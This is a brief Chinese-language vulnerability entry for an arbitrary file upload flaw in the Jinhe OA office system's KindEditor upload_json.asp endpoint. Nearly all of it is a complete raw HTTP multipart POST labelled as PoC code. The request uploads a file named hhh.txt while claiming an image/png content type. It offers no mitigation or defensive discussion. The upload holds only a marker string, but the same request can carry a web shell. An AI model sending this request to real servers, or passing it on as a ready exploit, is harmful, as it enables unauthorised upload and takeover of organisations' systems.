漏洞描述
金和OA /c6/KindEditor1/asp/upload_json.asp?dir=file 存在任意文件上传漏洞
金和OA /c6/KindEditor1/asp/upload_json.asp 任意文件上传漏洞
PoC代码
POST /c6/KindEditor1/asp/upload_json.asp?dir=file HTTP/1.1
Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 336
Content-Type: multipart/form-data; boundary=---------------------------153857212076213662067051609723
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0.3 Safari/604.5.6
-----------------------------153857212076213662067051609723
Content-Disposition: form-data; name="localUrl"
-----------------------------153857212076213662067051609723
Content-Disposition: form-data; name="imgFile"; filename="hhh.txt"
Content-Type: image/png
hhh
-----------------------------153857212076213662067051609723--